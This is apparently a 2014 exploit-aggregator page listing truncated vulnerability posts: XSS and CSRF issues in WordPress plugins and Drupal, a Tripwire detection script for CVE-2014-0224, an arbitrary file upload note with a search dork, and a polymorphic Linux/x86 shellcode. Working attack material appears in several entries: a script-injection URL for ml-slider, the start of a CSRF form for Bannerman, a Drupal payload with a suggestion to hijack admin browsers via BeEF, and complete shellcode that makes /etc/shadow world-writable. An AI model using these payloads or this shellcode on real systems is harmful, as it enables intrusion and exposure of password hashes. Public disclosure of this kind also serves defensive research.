WordPress Random Banner 1.1.2.1 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress random-banner.1.1.2.1 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/random-banner/
 
# Software Link : http://downloads.wordpress.org/plugin/random-banner.1.1.2.1.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<input placeholder="Link for that image"  type="text" size="25"  
name="buffercode_RBanner_url_banner1" value="<?php echo  
get_option('buffercode_RBanner_url_banner1') ?>" />
 
 
######################
 
Exploit...


WordPress Custom Banners 1.2.2.2 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress custom-banners 1.2.2.2 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/custom-banners/
 
# Software Link : http://downloads.wordpress.org/plugin/custom-banners.zip
 
# Date : 2014-06-28
 
# Tested on : Windows 7 / Mozilla Firefox
 
######################
 
# Vulnerable code :
 
<table class="form-table">
  <tr valign="top">
    <th scope="row"><label for="custom_banners_registered_name">Email  
Address</label></th>
    <td><input type="text" name="custom_banners_registered_name"...


WordPress Bannerman 0.2.4 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/bannerman/
 
# Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/options-general.php?page=bannerman
 
######################
 
Exploit Code:
 
<html>
<body>
<form name="post_form" action="http://localhost/wp-admin/options-general.php?page=bannerman" method="post">
<input type='hidden' name="bannerman_background"...


WordPress ml-slider 2.5 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Wordpress ml-slider 2.5 Cross Site Scripting
 
# Exploit Author : Ashiyane Digital Security Team
 
# Vendor Homepage : http://wordpress.org/plugins/ml-slider
 
# Software Link : downloads.wordpress.org/plugin/ml-slider.2.5.zip
 
# Date : 2014-06-27
 
# Tested on : Windows 7 / Mozilla Firefox
######################
 
# Location : http://localhost/wp-admin/admin.php?page=metaslider&id=1[xss]
 
 
# Exploit:  
http://localhost/wp-admin/admin.php?page=metaslider&id=1"/><script>alert(1);</script>
 
#####################
 
Discovered By : ACC3SS
 
#####################

...

Drupal 5 / 6 / 7 Cross Site Scripting

1 July 2014 - Source: http://www.mondounix.com
Hi,
 
There is a persistent XSS in Drupal versions 5.x, 6.x and 7.x ( I have not
yet tested Drupal 8.x due to not being fully released ).
 
The function which is vulnerable is the watchdog() function, where the
$message parameter does not get sanitized and you can pass through
arbitrary code to be executed on the client's browser.
 
This can be exploited if a module/theme/hook call directly calls the
watchdog function. You could pass in a simple:
<script>alert(document.domain);</script> or whatever payload you wish.
 
For example, you could hijack the admin's browser using something like BeEF
framework or similar tools.
 
A simple way to fix this bug would be to wrap the $message in htmlentities().
 
Thanks.
 
Richard...


WordPress Simple Share Buttons Adder 4.4 CSRF / XSS

1 July 2014 - Source: http://www.mondounix.com
Details
================
Software: Simple Share Buttons Adder
Version: 4.4
Homepage: https://wordpress.org/plugins/simple-share-buttons-adder/
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-simple-share-buttons-adder/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:P)
 
Description
================
CSRF and stored XSS in Simple Share Buttons Adder 4.4
 
Vulnerability
================
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript in the context of the Homepage, Pages, Posts, Category/Archive pages and post Excerpts.
 
 
Proof of concept
================
If a logged-in administrator user clicks...


Tripwire VERT CVE-2014-0224 Detection Tool v0.3

24 June 2014 - Source: http://www.mondounix.com
#!/bin/python
 
import sys
import socket
import time
import struct
 
if len(sys.argv)<2:
    print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
    quit()
else:
    strHost = sys.argv[1]
    if len(sys.argv)>2:
        try:
            iPort = int(sys.argv[2])
        except:
            print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3\nUsage: %s <host> [port=443]" % (sys.argv[0])
            quit()
    else:
        iPort = 443
 
print "***CVE-2014-0224 Detection Tool v0.3***\nBrought to you by Tripwire...


jQuery PHP Arbitrary Upload

24 June 2014 - Source: http://www.mondounix.com
[+] Arbitrary Upload on jQuery/PHP
 
[+] Date: 23/06/2014
 
[+] Risk: High
 
[+] CWE Number : CWE-264
 
[+] Author: Felipe Andrian Peixoto
 
[+] Vendor Homepage: http://rafaelcouto.com.br/upload-dinamico-com-php-jquery/#sthash.uVv21WU9.dpuf
 
[+] Contact: felipe_andrian@hotmail.com
 
[+] Tested on: Windows 7 and Linux
 
[+] Dork: "Upload dinâmico com jQuery/PHP"
 
[+] Exploit : http://host/patch/upload.php
 
[+] PoC: 
 

...


Linux/x86 chmod 0777 /etc/shadow Polymorphic Shellcode

24 June 2014 - Source: http://www.mondounix.com
/*
; Title:    chmod 0777 /etc/shadow Polymorphic Shellcode - 51 Bytes
; Platform: linux/x86
; Date:     2014-06-22
; Author:   Osanda Malith Jayathissa (@OsandaMalith)
 
section .text
  global _start
 
_start:  
  mov ebx, eax
  xor eax, ebx
  push dword eax
  mov esi, 0x563a1f3e
  add esi, 0x21354523
  mov dword [esp-4], esi
  mov dword [esp-8], 0x68732f2f
  mov dword [esp-12], 0x6374652f
  sub esp, 12
  mov    ebx,esp
  push word  0x1ff
  pop    cx
  mov    al,0xf
  int    0x80
 
*/
 
#include <stdio.h>
#include <string.h>
 
unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";
 
int
main()...
